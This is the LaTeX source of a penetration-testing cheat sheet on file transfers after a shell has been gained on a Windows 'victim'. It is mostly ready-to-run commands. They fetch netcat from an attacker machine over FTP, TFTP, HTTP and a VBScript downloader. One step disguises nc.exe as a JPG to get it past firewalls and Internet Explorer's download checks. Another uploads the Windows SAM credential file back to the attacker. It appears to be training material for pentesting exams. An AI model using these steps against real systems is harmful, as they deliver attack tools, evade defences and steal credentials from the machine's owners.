\documentclass[10pt,a4paper]{article}

% Packages
\usepackage{fancyhdr}           % For header and footer
\usepackage{multicol}           % Allows multicols in tables
\usepackage{tabularx}           % Intelligent column widths
\usepackage{tabulary}           % Used in header and footer
\usepackage{hhline}             % Border under tables
\usepackage{graphicx}           % For images
\usepackage{xcolor}             % For hex colours
%\usepackage[utf8x]{inputenc}    % For unicode character support
\usepackage[T1]{fontenc}        % Without this we get weird character replacements
\usepackage{colortbl}           % For coloured tables
\usepackage{setspace}           % For line height
\usepackage{lastpage}           % Needed for total page number
\usepackage{seqsplit}           % Splits long words.
%\usepackage{opensans}          % Can't make this work so far. Shame. Would be lovely.
\usepackage[normalem]{ulem}     % For underlining links
% Most of the following are not required for the majority
% of cheat sheets but are needed for some symbol support.
\usepackage{amsmath}            % Symbols
\usepackage{MnSymbol}           % Symbols
\usepackage{wasysym}            % Symbols
%\usepackage[english,german,french,spanish,italian]{babel}              % Languages

% Document Info
\author{fred}
\pdfinfo{
  /Title (file-transfers.pdf)
  /Creator (Cheatography)
  /Author (fred)
  /Subject (File Transfers Cheat Sheet)
}

% Lengths and widths
\addtolength{\textwidth}{6cm}
\addtolength{\textheight}{-1cm}
\addtolength{\hoffset}{-3cm}
\addtolength{\voffset}{-2cm}
\setlength{\tabcolsep}{0.2cm} % Space between columns
\setlength{\headsep}{-12pt} % Reduce space between header and content
\setlength{\headheight}{85pt} % If less, LaTeX automatically increases it
\renewcommand{\footrulewidth}{0pt} % Remove footer line
\renewcommand{\headrulewidth}{0pt} % Remove header line
\renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit
% This two commands together give roughly
% the right line height in the tables
\renewcommand{\arraystretch}{1.3}
\onehalfspacing

% Commands
\newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour
\newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols
\newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns
\newcommand{\tn}{\tabularnewline} % Required as custom column type in use

% Font and Colours
\definecolor{HeadBackground}{HTML}{333333}
\definecolor{FootBackground}{HTML}{666666}
\definecolor{TextColor}{HTML}{333333}
\definecolor{DarkBackground}{HTML}{A3A3A3}
\definecolor{LightBackground}{HTML}{F3F3F3}
\renewcommand{\familydefault}{\sfdefault}
\color{TextColor}

% Header and Footer
\pagestyle{fancy}
\fancyhead{} % Set header to blank
\fancyfoot{} % Set footer to blank
\fancyhead[L]{
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{C}
    \SetRowColor{DarkBackground}
    \vspace{-7pt}
    {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent
        \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}}
    }
\end{tabulary}
\columnbreak
\begin{tabulary}{11cm}{L}
    \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{File Transfers Cheat Sheet}}}} \\
    \normalsize{by \textcolor{DarkBackground}{fred} via \textcolor{DarkBackground}{\uline{cheatography.com/22666/cs/9067/}}}
\end{tabulary}
\end{multicols}}

\fancyfoot[L]{ \footnotesize
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{LL}
  \SetRowColor{FootBackground}
  \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}}  \\
  \vspace{-2pt}fred \\
  \uline{cheatography.com/fred} \\
  \end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
  \SetRowColor{FootBackground}
  \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}}  \\
   \vspace{-2pt}Published 9th September, 2016.\\
   Updated 9th September, 2016.\\
   Page {\thepage} of \pageref{LastPage}.
\end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
  \SetRowColor{FootBackground}
  \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}}  \\
  \SetRowColor{white}
  \vspace{-5pt}
  %\includegraphics[width=48px,height=48px]{dave.jpeg}
  Measure your website readability!\\
  www.readability-score.com
\end{tabulary}
\end{multicols}}




\begin{document}
\raggedright
\raggedcolumns

% Set font size to small. Switch to any value
% from this page to resize cheat sheet text:
% www.emerson.emory.edu/services/latex/latex_169.html
\footnotesize % Small font.

\begin{multicols*}{4}

\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{Info}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{{\bf{Check Transfer Progress}} \newline % Row Count 1 (+ 1)
\seqsplit{http://www.cyberciti.biz/open-source/command-line-hacks/pv-command-examples/}% Row Count 3 (+ 2)
} \tn 
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{DEBUG.exe}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{{\bf{Note:}} Uploaded file cannot be larger than 64-bytes. UPX can be used to compress files. \newline % Row Count 2 (+ 2)
`locate exe2bat.exe` \newline % Row Count 3 (+ 1)
`wine exe2bat.exe` \newline % Row Count 4 (+ 1)
`upx -9 nc.exe` (to compress nc.exe) \newline % Row Count 5 (+ 1)
`ls -l nc.exe` (should now be smaller) \newline % Row Count 6 (+ 1)
`wine exe2bat.exe /root/nc.exe nc.txt` (convert nc.exe to nc.txt) \newline % Row Count 8 (+ 2)
`cat nc.txt | more` (should be a hex dump) \newline % Row Count 9 (+ 1)
Near the end of nc.txt, exe2bat tells the debugger on the windows victim to create an exe \newline % Row Count 11 (+ 2)
Gain your shell using your usual exploit then copy and paste the contents of nc.txt into the remote shell. If it fails, re-run any failed commands manually. nc.exe will now be created on the victim machine.% Row Count 16 (+ 5)
} \tn 
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{Python}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{{\bf{Victim}} \newline % Row Count 1 (+ 1)
`python -m SimpleHTTPServer` \newline % Row Count 2 (+ 1)
{\bf{Attacker}} \newline % Row Count 3 (+ 1)
Browse to victim from attacking machine for a directory listing% Row Count 5 (+ 2)
} \tn 
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{Netcat}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{`nc -lvp 12345 | tar -xf -` (on receiver) \newline % Row Count 1 (+ 1)
`tar -cf - filename.txt | nc -vn 192.168.1.14 12345` (on sender) \newline % Row Count 3 (+ 2)
{\bf{Note:}} You will have no indication of file progress. just wait a period of time then CTRL+C \newline % Row Count 5 (+ 2)
\seqsplit{http://www.g-loaded.eu/2006/11/06/netcat-a-couple-of-useful-examples/}% Row Count 7 (+ 2)
} \tn 
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{FTP - Windows}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{Connect to an ftp server on port 80 \newline % Row Count 1 (+ 1)
`ftp` \newline % Row Count 2 (+ 1)
`open x.x.x.x 80` \newline % Row Count 3 (+ 1)
Connect using commands in config.txt \newline % Row Count 4 (+ 1)
`ftp -n -v -s:config.txt 10.2.10.14` \newline % Row Count 5 (+ 1)
`config.txt:` \newline % Row Count 6 (+ 1)
`user uid1234` (username) \newline % Row Count 7 (+ 1)
`uid1234` (password) \newline % Row Count 8 (+ 1)
`quit`% Row Count 9 (+ 1)
} \tn 
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{FTP Upload}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{Outbound FTP is usually allowed in companies. \newline % Row Count 1 (+ 1)
{\bf{Kali}} \newline % Row Count 2 (+ 1)
`pure-pw useradd hacker -u ftpusers -d /ftphome/` (create user hacker) \newline % Row Count 4 (+ 2)
`pure-pw mkdb` \newline % Row Count 5 (+ 1)
`cp /pentest/windows/nc.exe /ftphome` \newline % Row Count 6 (+ 1)
`/etc/init.d/pure-ftpd start` \newline % Row Count 7 (+ 1)
`ftp 127.0.0.1` (test login) \newline % Row Count 8 (+ 1)
`ls` (nc.exe should appear) \newline % Row Count 9 (+ 1)
`bye` \newline % Row Count 10 (+ 1)
{\bf{Victim (Windows)}} \newline % Row Count 11 (+ 1)
After getting a shell: \newline % Row Count 12 (+ 1)
`echo open 192.168.34.10 \textgreater{} ftp.txt` (commands to be run in the -s step) \newline % Row Count 14 (+ 2)
`echo myftp\textgreater{}\textgreater{} ftp.txt` (no space between username and append command) \newline % Row Count 16 (+ 2)
`echo myftp\textgreater{}\textgreater{} ftp.txt` \newline % Row Count 17 (+ 1)
`echo bin \textgreater{}\textgreater{} ftp.txt` \newline % Row Count 18 (+ 1)
`echo get nc.exe \textgreater{}\textgreater{} ftp.txt` \newline % Row Count 19 (+ 1)
`echo bye \textgreater{}\textgreater{} ftp.txt` \newline % Row Count 20 (+ 1)
`ftp -s:ftp.txt` (-s run commands in ftp.txt)% Row Count 21 (+ 1)
} \tn 
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{FTP - Pure-FTPD}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{`/etc/init.d/pure-ftpd start` (start ftp server) \newline % Row Count 1 (+ 1)
`netstat -antp` (confirm server on port 21) \newline % Row Count 2 (+ 1)
`/etc/init.d/pure-ftpd stop` (stop ftp server) \newline % Row Count 3 (+ 1)
`ls -l /ftphome` (home ftp directory created by ftpd) \newline % Row Count 5 (+ 2)
`cp nc.exe /ftphome` (copy netcat to ftphome)  \newline % Row Count 6 (+ 1)
`ftp 127.0.0.1` (login ftp to server) \newline % Row Count 7 (+ 1)
`ls` (netcat should appear) \newline % Row Count 8 (+ 1)
`bin` (switch to binary for file transfer) \newline % Row Count 9 (+ 1)
`get nc.exe` (confirm file transfer works) \newline % Row Count 10 (+ 1)
`bye` \newline % Row Count 11 (+ 1)
`file nc.exe` (confirm file properties are intact)% Row Count 12 (+ 1)
} \tn 
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{Internet Explorer}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{Can be good for bypassing Firewalls \newline % Row Count 1 (+ 1)
`mv nc.exe to nc.jpg` (exe files will open a dialog, so they need to be converted) \newline % Row Count 3 (+ 2)
`./ability-linux` (gain your remote shell) \newline % Row Count 4 (+ 1)
`cd prog*` \newline % Row Count 5 (+ 1)
`cd internet*` \newline % Row Count 6 (+ 1)
`start iexplore.exe \seqsplit{http://192.168.8.173/nc.jpg`} (nc.jpg will be downloaded to temp directory) \newline % Row Count 8 (+ 2)
Navigate to the temporary internet files on the victim (e.g. c:\textbackslash{}documents and settings\textbackslash{}offsec\textbackslash{}local settings\textbackslash{}temporary internet files) \newline % Row Count 11 (+ 3)
`copy nc.jpg c:\textbackslash{} ` \newline % Row Count 12 (+ 1)
`cd\textbackslash{} ` \newline % Row Count 13 (+ 1)
`rename nc.jpg nc.exe` \newline % Row Count 14 (+ 1)
`nc.exe` (nc should be functional)% Row Count 15 (+ 1)
} \tn 
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{down.vbs}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{'Barabas pure vbs downloader - tested on XP sp2 \newline % Row Count 1 (+ 1)
'Microsoft fixed adodbstream but guess what :) \newline % Row Count 2 (+ 1)
'(c)dec 2004 \newline % Row Count 3 (+ 1)
'First argument = complete url to download \newline % Row Count 4 (+ 1)
'Second Argument = filename you want to save \newline % Row Count 5 (+ 1)
'thnks to \seqsplit{http://www.ericphelps.com/scripting/samples/BinaryDownload/} \newline % Row Count 7 (+ 2)
' \newline % Row Count 8 (+ 1)
'v2 - now includes proxy support for the winhttp request stuff \newline % Row Count 10 (+ 2)
strUrl = \seqsplit{WScript.Arguments.Item(0)} \newline % Row Count 11 (+ 1)
StrFile = \seqsplit{WScript.Arguments.Item(1)} \newline % Row Count 12 (+ 1)
'WinHttpRequest proxy settings. \newline % Row Count 13 (+ 1)
Const \seqsplit{HTTPREQUEST\_PROXYSETTING\_} \newline % Row Count 14 (+ 1)
DEFAULT = 0 \newline % Row Count 15 (+ 1)
Const \seqsplit{HTTPREQUEST\_PROXYSETTING\_PRECONFIG} = 0 \newline % Row Count 16 (+ 1)
Const \seqsplit{HTTPREQUEST\_PROXYSETTING\_DIRECT} = 1% Row Count 17 (+ 1)
} \tn 
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{VBS Download (with down.vbs)}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{`cat down.vbs` (confirm contents) \newline % Row Count 1 (+ 1)
`sed 's/\textasciicircum{}echo /' download-vbscript` (add echo to start of lines) \newline % Row Count 3 (+ 2)
`sed 's/\textasciicircum{}echo /' download-vbscript | sed 's/S/ \textgreater{}\textgreater{} down.vbs/' ` (add append to end of lines) \newline % Row Count 5 (+ 2)
`sed 's/\textasciicircum{}echo /' download-vbscript | sed 's/S/ \textgreater{}\textgreater{} down.vbs/' | grep -v 'echo \textgreater{}\textgreater{} down.dbs' ` (remove echo on blank lines) \newline % Row Count 8 (+ 3)
`/etc/init.d/apache2 start` \newline % Row Count 9 (+ 1)
`cp nc.exe /var/www/` \newline % Row Count 10 (+ 1)
After getting a shell on your Victim: \newline % Row Count 11 (+ 1)
Copy and paste the text output of the final sed command above and hit enter to create down.vbs. \newline % Row Count 13 (+ 2)
`cscript down.vbs \seqsplit{http://192.168.8.173/nc.exe} nc2.exe` (to run down.vbs, which will download nc.exe to nc2.exe) \newline % Row Count 16 (+ 3)
`nc.exe` (check if file is functional)% Row Count 17 (+ 1)
} \tn 
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{TFTP Server}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{{\bf{Kali}} \newline % Row Count 1 (+ 1)
`apt-get install atftpd` \newline % Row Count 2 (+ 1)
`atftpd -{}-daemon -{}-port 69 /tmp` (start in daemon mode on port 69, home directory /tmp) \newline % Row Count 4 (+ 2)
`atftpd -{}-daemon -{}-port 1234 /tmp` (start in daemon mode on port 1234, home directory /tmp) \newline % Row Count 6 (+ 2)
`netstat -anup | grep atftp` (should be listening on port 69 udp) \newline % Row Count 8 (+ 2)
`cp /nc.exe /tmp` \newline % Row Count 9 (+ 1)
{\bf{Downloading in Linux}} \newline % Row Count 10 (+ 1)
`tftp 127.0.0.1` (connect to server) \newline % Row Count 11 (+ 1)
`get nc.exe` \newline % Row Count 12 (+ 1)
`quit` \newline % Row Count 13 (+ 1)
`ls -l nc.exe` \newline % Row Count 14 (+ 1)
`file nc.exe` \newline % Row Count 15 (+ 1)
{\bf{Kill Server}} \newline % Row Count 16 (+ 1)
`ps -ef | grep atftp` \newline % Row Count 17 (+ 1)
`kill -9 16084` (first column number) \newline % Row Count 18 (+ 1)
`netstat -anup | grep 69` (confirm server has been killed)% Row Count 20 (+ 2)
} \tn 
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{TFTP}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{{\bf{Note:}} Most corporate firewalls will block outbound traffic rendering TFTP unusable. TFTP might not be on Windows machines. Files transferred will usually be read only. Change attrib of file to delete using attrib -r filename. \newline % Row Count 5 (+ 5)
{\bf{Download from Attacker}} \newline % Row Count 6 (+ 1)
{\bf{Kali}} \newline % Row Count 7 (+ 1)
`atftpd -{}-daemon -{}-port 69 /tmp` \newline % Row Count 8 (+ 1)
\seqsplit{`/usr/share/windows-binaries/nc}.exe /tmp` \newline % Row Count 9 (+ 1)
`chmod 777 /tmp/nc.exe` \newline % Row Count 10 (+ 1)
{\bf{Windows}} \newline % Row Count 11 (+ 1)
Initiate your remote shell to the Windows PC using your exploit: \newline % Row Count 13 (+ 2)
`./ability-linux.py` (ability exploit, served, shell started) \newline % Row Count 15 (+ 2)
`cd\textbackslash{}` \newline % Row Count 16 (+ 1)
`tftp -i 192.168.23.10 GET nc.exe` (on Windows Victim, IP = Kali) \newline % Row Count 18 (+ 2)
{\bf{Upload to Attacker}} \newline % Row Count 19 (+ 1)
`tftp -i 192.168.8.172 PUT sam` \newline % Row Count 20 (+ 1)
sam should now appear in /tmp on the Kali machine \newline % Row Count 21 (+ 1)
{\bf{Download in Windows}} \newline % Row Count 22 (+ 1)
`tftp get 2.3.5.1:/lanscan` (get the file lanscan from TFTP server 2.3.5.1)% Row Count 24 (+ 2)
} \tn 
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}


% That's all folks
\end{multicols*}

\end{document}